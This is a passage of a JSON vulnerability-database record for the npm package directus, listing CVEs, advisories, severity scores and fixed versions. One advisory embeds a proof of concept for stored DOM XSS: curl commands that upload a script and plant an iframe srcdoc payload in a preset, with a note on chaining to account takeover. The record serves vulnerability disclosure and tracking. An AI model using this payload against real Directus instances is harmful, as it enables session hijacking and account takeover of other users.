{"url":"http://public2.vulnerablecode.io/api/packages/547999?format=json","purl":"pkg:npm/directus@0.1.0-preview.16","type":"npm","namespace":"","name":"directus","version":"0.1.0-preview.16","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.2.1","latest_non_vulnerable_version":"11.17.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105428?format=json","vulnerability_id":"VCID-32e6-c1bv-efea","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows with the WebHook trigger all incoming request details are logged including security sensitive data like access and refresh tokens in cookies. Malicious admins with access to the logs can hijack the user sessions within the token expiration time of them triggering the Flow. Version 11.9.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54588","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54713","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"22be460c76957708d67fdd52846a9ad1cbb083fb","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/directus/directus/pull/25354","reference_id":"25354","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/pull/25354"},{"reference_url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53886","GHSA-f24x-rm6g-3w5v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-32e6-c1bv-efea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40734?format=json","vulnerability_id":"VCID-54ja-4vrx-tbgm","summary":"Directus is a real-time API and App dashboard for managing SQL database content. An unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include redirect query string. This happens because on that endpoint for both OpenId and Oauth2 Directus is using the respond middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials. This vulnerability is fixed in 10.13.3 and 11.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596","reference_id":"","reference_type":"","scores":[{"value":"0.00753","scoring_system":"epss","scoring_elements":"0.73725","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00753","scoring_system":"epss","scoring_elements":"0.7365","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"769fa22797bff5a9231599883b391e013f122e52","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596","reference_id":"CVE-2024-45596","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596"},{"reference_url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33327?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/33329?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-3vnr-k31f-vycv"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-45596","GHSA-cff8-x7jv-4fm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-54ja-4vrx-tbgm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360571?format=json","vulnerability_id":"VCID-79ch-vtkp-q3cd","summary":"Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n    -c \"${root_dir}/static/attacker_directus_session_token\" \\\n    -H 'Content-Type: application/json' \\\n    -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n  curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    -F \"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the JavaScript file will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw"},{"reference_url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"GHSA-9qrm-48qf-r2rw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377107?format=json","purl":"pkg:npm/directus@11.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3"}],"aliases":["GHSA-9qrm-48qf-r2rw"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79ch-vtkp-q3cd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/166718?format=json","vulnerability_id":"VCID-8ch7-zwuu-zufp","summary":"In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76336","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76265","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12022","reference_id":"12022","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/pull/12022"},{"reference_url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md","reference_id":"config-options.md","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md"},{"reference_url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS","reference_id":"CORS","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969","reference_id":"CVE-2022-26969","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969"},{"reference_url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822","reference_id":"SNYK-JS-DIRECTUS-2441822","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"v9.7.0","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/20019?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eb1b-zvas-muey"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-26969","GHSA-g27j-74fp-xfpr","GMS-2022-677"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8ch7-zwuu-zufp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71947?format=json","vulnerability_id":"VCID-9dsr-kz3s-hkdx","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. This vulnerability is fixed in 